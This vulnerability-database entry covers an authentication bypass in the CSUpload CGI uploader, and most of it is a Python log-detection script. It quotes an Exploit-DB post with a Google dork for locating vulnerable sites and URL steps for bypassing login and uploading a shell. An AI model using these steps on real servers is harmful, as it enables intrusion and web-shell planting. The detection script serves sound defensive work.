Vendor: CSUpload
By: Satanic2000
CVSS: 7.5 (HIGH)
Vulnerability: Authentication Bypass
CWE: 287
Product Name: CSUpload
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: None
CPE: cgiscript.net
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2014

csUpload Script Site Authentication Bypass

CSUpload is a file uploader script. Its CSUpload.cgi script contains an authentication bypass: the login page is reached by appending ?command=login to the script URL, and an attacker who bypasses authentication gains access to the database and can upload files or shells.

Mitigation:

Ensure that authentication is properly implemented and enforced.

Exploit-DB raw data:

# Exploit Title: ["csUpload Script Site" Authentication Bypass]
# Google Dork: [CSUpload.cgi?command=]
# Date: 4/9/2014
# Exploit Author: Satanic2000
# Vendor Homepage: http://www.cgiscript.net
# Software Link: http://www.cgiscript.net/cgi-script/csNews/csNews.cgi?database=cgi.db&command=viewone&id=12
# Version: 
# Tested on: linux
# www.Site.com/[path]/CSUpload/CSUpload.cgi
# [path] : /cgi-script/     or /cgi-bin/ or None

# Example:

# 1-  http://localhost/cgi-bin/CSUpload//CSUpload.cgi?command=login

# 2- Bypass Authentication  http://localhost/cgi-bin/CSUpload/CSUpload.cgi

# 3- Select Database Select Databases And Upload (File,Or Shell)

# Special tnx S3Ri0uS . Pejvak . l3l4ck.$c0rpi0n And Other Friend
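
With no patch listed, one practical check is to review web server logs for the request sequence in the steps above: the login page, then the bare script URL, then an upload. The following detection sketch is an added example, not part of the original advisory or exploit post; it assumes Apache common log format and that the upload arrives as a POST, and the log lines are constructed sample data.

```python
import re
from collections import defaultdict

# Constructed sample lines in Apache common log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [09/Apr/2014:10:00:01 +0000] "GET /cgi-bin/CSUpload/CSUpload.cgi?command=login HTTP/1.1" 200 812
203.0.113.7 - - [09/Apr/2014:10:00:05 +0000] "GET /cgi-bin/CSUpload/CSUpload.cgi HTTP/1.1" 200 2301
203.0.113.7 - - [09/Apr/2014:10:00:20 +0000] "POST /cgi-bin/CSUpload/CSUpload.cgi HTTP/1.1" 200 455
198.51.100.4 - - [09/Apr/2014:10:01:00 +0000] "GET /cgi-bin/CSUpload/CSUpload.cgi?command=login HTTP/1.1" 200 812
198.51.100.4 - - [09/Apr/2014:10:01:09 +0000] "GET /index.html HTTP/1.1" 200 1044
192.0.2.9 - - [09/Apr/2014:10:02:00 +0000] "POST /cgi-script/CSUpload/CSUpload.cgi HTTP/1.1" 200 455
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Matches the script under any prefix (/cgi-bin/, /cgi-script/ or none);
# "/+" tolerates the doubled slash that appears in step 1 of the write-up.
SCRIPT = re.compile(r'/CSUpload/+CSUpload\.cgi$', re.IGNORECASE)
# Order of requests described in the write-up (upload-as-POST is an assumption).
ORDER = ["login_page", "bare_script", "post"]


def classify(method, target):
    """Map one request to a step name, or None if it is unrelated."""
    path, _, query = target.partition("?")
    if not SCRIPT.search(path):
        return None
    params = query.lower().split("&") if query else []
    if method == "GET" and "command=login" in params:
        return "login_page"
    if method == "GET" and not query:
        return "bare_script"
    if method == "POST":
        return "post"
    return None


def find_suspect_clients(log_text):
    """Return client IPs that completed all three steps in order with 2xx replies."""
    progress = defaultdict(int)  # client -> number of steps matched so far
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # skip lines that are not in the assumed format
        client, method, target, status = m.groups()
        idx = progress[client]
        if idx < len(ORDER) and status.startswith("2") and classify(method, target) == ORDER[idx]:
            progress[client] += 1
    return sorted(c for c, n in progress.items() if n == len(ORDER))


if __name__ == "__main__":
    print(find_suspect_clients(SAMPLE_LOG))
```

A match is a lead for review rather than proof of compromise, since a legitimate administrator may produce the same sequence; correlate flagged clients with files that appeared in the upload directory.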